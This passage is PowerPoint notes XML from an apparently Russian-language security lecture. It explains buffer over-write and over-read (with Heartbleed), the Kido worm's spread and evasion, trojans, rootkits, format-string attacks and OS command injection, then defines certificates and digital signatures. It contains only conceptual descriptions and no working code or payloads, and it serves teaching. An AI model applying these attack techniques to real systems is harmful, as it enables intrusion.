              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Buffer over-write – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>отсутствие проверок при записи. Позволяет перезаписать область команд в программе</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Buffer over-read – </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>отсутствие проверок при чтении. Позволяет получить доступ к приватной области памяти (пример: уязвимость </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> в </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>OpenSSL http://en.wikipedia.org/wiki/Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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5" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Столь быстрое распространение вируса </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Kido</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> связано со службой Server service. Используя «дыру» в ней, червь скачивает себя из интернета. Интересно, что разработчики вируса научились постоянно менять свои сервера, что раньше не удавалось злоумышленникам. Также он может распространяться через USB-накопители.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Червь находит уязвимости Windows, связанные с переполнением буфера и при помощи обманного RPC-запроса выполняет код. Первым делом он отключает ряд служб: автоматическое обновление Windows, Windows Security Center, Windows Defender и Windows Error Reporting, а также блокирует доступ к сайтам ряда производителей антивирусов.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Периодически червь случайным образом генерирует список сайтов (около 50 тыс. доменных имён в сутки), к которым обращается для получения исполняемого кода. При получении с сайта исполняемого файла червь сверяет электронно-цифровую подпись и, если она совпала, исполняет файл.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Кроме того, червь реализует P2P механизм обмена обновлениями, что позволяет ему рассылать обновления удалённым копиям, минуя управляющий сервер.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>13 января 2009 Microsoft обещал 250 000 долларов за информацию о создателях вируса</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="414"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Троя́нская программа </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(также — троя́н, троя́нец, троя́нский конь, тро́й) — программа, используемая злоумышленником для сбора информации, её разрушения или модификации, нарушения работоспособности компьютера или использования его ресурсов в неблаговидных целях. Действие троянской программы может и не быть в действительности вредоносным, но трояны заслужили свою дурную славу за их использование в инсталляции программ типа Backdoor. По принципу распространения и действия троян не является вирусом, так как не способен распространяться саморазмножением.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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7" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Rootkit (руткит, от англ. root kit, то есть «набор root'а») — программа или набор программ для скрытия следов присутствия злоумышленника или вредоносной программы в системе.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Термин Rootkit исторически пришёл из мира UNIX, и под этим термином понимается набор утилит или специальный модуль ядра, которые взломщик устанавливает на взломанной им компьютерной системе сразу после получения прав суперпользователя. Этот набор, как правило, включает в себя разнообразные утилиты для «заметания следов» вторжения в систему, сниферы, сканеры, кейлоггеры, троянские программы, замещающие основные утилиты UNIX (в случае неядерного руткита). Rootkit позволяет взломщику закрепиться во взломанной системе и скрыть следы своей деятельности путём сокрытия файлов, процессов, а также самого присутствия руткита в системе.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Атака на функции форматирования строк</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>При использовании этих атак путь исполнения программы модифицируется методом перезаписи областей памяти с помощью функций форматирования символьных переменных. Уязвимость возникает, когда пользовательские данные применяются в качестве аргументов функций форматирования строк, таких как fprintf, printf, sprintf, setproctitle, syslog и т.д. Если атакующий передает приложению строку, содержащую символы форматирования ("%f", "%p", "%n" и т.д.), то у него появляется возможность:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>- выполнить произвольный код на сервере;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>- считывать значения из стека;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>- вызывать ошибки в программе/отказ в обслуживании.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Выполнение команд ОС</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="700" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Атаки этого класса направлены на выполнение команд операционной системы на Web-сервере путем манипуляции входными данными. Если информация, полученная от клиента, должным образом не верифицируется, атакующий получает возможность выполнить команды ОС. Они  будут выполняться с тем же уровнем привилегий, с каким работает компонент приложения, выполняющий запрос (сервер СУБД, Web-сервер и т.д).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="700" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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9" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Диаграмма создана по статистике </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Web Hacking Incident Database</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>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1" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150920" y="692280"/>
            <a:ext cx="4554000" cy="3414240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4343400"/>
            <a:ext cx="5027040" cy="4112640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90360" rIns="90360" tIns="44280" bIns="44280" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Сертификат (сертификат открытого ключа, сертификат ЭЦП) — цифровой или бумажный документ, подтверждающий соответствие между открытым ключом и информацией, идентифицирующей владельца ключа. Содержит информацию о владельце ключа, сведения об открытом ключе, его назначении и области применения, название центра сертификации и т. д.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="216000" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="451"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Электро́нная цифрова́я по́дпись (ЭЦП)— реквизит электронного документа, предназначенный для защиты данного электронного документа от подделки, полученный в результате криптографического преобразования информации с использованием закрытого ключа электронной цифровой подписи и позволяющий идентифицировать владельца сертификата ключа подписи, а также установить отсутствие искажения информации в электронном документе, [1] а также обеспечивает неотказуемость подписавшегося.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide4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3" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
